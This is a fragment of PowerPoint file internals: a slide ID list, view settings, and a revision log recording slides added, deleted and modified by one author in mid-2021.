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sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="512" r:id="rId3"/>
    <p:sldId id="373" r:id="rId4"/>
    <p:sldId id="444" r:id="rId5"/>
    <p:sldId id="446" r:id="rId6"/>
    <p:sldId id="490" r:id="rId7"/>
    <p:sldId id="491" r:id="rId8"/>
    <p:sldId id="492" r:id="rId9"/>
    <p:sldId id="445" r:id="rId10"/>
    <p:sldId id="493" r:id="rId11"/>
    <p:sldId id="494" r:id="rId12"/>
    <p:sldId id="495" r:id="rId13"/>
    <p:sldId id="496" r:id="rId14"/>
    <p:sldId id="497" r:id="rId15"/>
    <p:sldId id="453" r:id="rId16"/>
    <p:sldId id="454" r:id="rId17"/>
    <p:sldId id="498" r:id="rId18"/>
    <p:sldId id="510" r:id="rId19"/>
    <p:sldId id="499" r:id="rId20"/>
    <p:sldId id="500" r:id="rId21"/>
    <p:sldId id="501" r:id="rId22"/>
    <p:sldId id="502" r:id="rId23"/>
    <p:sldId id="503" r:id="rId24"/>
    <p:sldId id="504" r:id="rId25"/>
    <p:sldId id="505" r:id="rId26"/>
    <p:sldId id="506" r:id="rId27"/>
    <p:sldId id="507" r:id="rId28"/>
    <p:sldId id="467" r:id="rId29"/>
    <p:sldId id="508" r:id="rId30"/>
    <p:sldId id="509" r:id="rId31"/>
    <p:sldId id="511" r:id="rId32"/>
    <p:sldId id="42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B83AC-F9AE-4056-9599-2DACFAA8A130}" v="40" dt="2022-09-26T21:56:23.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7" autoAdjust="0"/>
    <p:restoredTop sz="86667" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="55" d="100"/>
          <a:sy n="55" d="100"/>
        </p:scale>
        <p:origin x="42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5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:38:19.716" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:38:19.716" v="0"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2616338024" sldId="373"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.201" v="12" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.988" v="22" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.667" v="26" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635951812" sldId="396"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.660" v="31" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3665038014" sldId="404"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.953" v="39" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2489270501" sldId="411"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:33.208" v="40" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3118374455" sldId="414"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.420" v="30" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4266318337" sldId="416"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:33.801" v="41" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4247754591" sldId="418"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3782016356" sldId="428"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.068" v="11" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4091828154" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.235" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="593614233" sldId="431"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.187" v="36" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2829655940" sldId="434"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:37.137" v="49" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4105321355" sldId="439"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:40.112" v="50" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1827660371" sldId="440"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:41.177" v="51" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="117761190" sldId="441"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:34.634" v="43" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4060643725" sldId="442"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:42.517" v="52" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="177244511" sldId="443"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:03:43.721" v="53" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="969276203" sldId="444"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:03:43.721" v="53" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="969276203" sldId="444"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2518429501" sldId="445"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2089025007" sldId="446"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.736" v="3" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="396884143" sldId="447"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.938" v="4" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2623075134" sldId="448"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.262" v="5" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3726437819" sldId="449"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.449" v="7" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2752542596" sldId="450"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.913" v="13" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1689162150" sldId="451"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.202" v="15" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3213363844" sldId="452"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2427580819" sldId="453"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="156228340" sldId="454"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.776" v="9" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="855798641" sldId="455"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.612" v="8" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3068364558" sldId="456"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.913" v="10" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="565360195" sldId="457"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.050" v="14" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2399777802" sldId="458"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.818" v="21" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="783190951" sldId="459"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.505" v="17" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3533845808" sldId="460"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:27.003" v="18" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="982174642" sldId="461"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:22.278" v="6" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="926730047" sldId="462"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:24.346" v="16" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2128572627" sldId="463"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.162" v="23" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3901806330" sldId="464"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.042" v="19" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1673180284" sldId="465"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.602" v="20" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="369337190" sldId="466"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="965843776" sldId="467"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.322" v="24" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1544977207" sldId="468"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.501" v="25" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3247576171" sldId="469"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.865" v="27" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3121458959" sldId="470"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.254" v="28" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2693326884" sldId="471"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.263" v="29" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127914859" sldId="472"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.073" v="32" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2516623109" sldId="475"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.393" v="33" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3141623341" sldId="476"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.714" v="34" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4107473677" sldId="477"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:31.858" v="35" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1773530336" sldId="478"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:34.221" v="42" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2418320045" sldId="481"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.426" v="37" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1683867025" sldId="482"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.693" v="38" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3022927922" sldId="484"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:34.898" v="44" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1979037057" sldId="485"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:35.185" v="45" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="229412847" sldId="486"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:35.713" v="46" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127162036" sldId="487"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:36.169" v="47" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1436574554" sldId="488"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:36.576" v="48" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3579863255" sldId="489"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1435293485" sldId="490"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3015196105" sldId="491"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1674251011" sldId="492"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
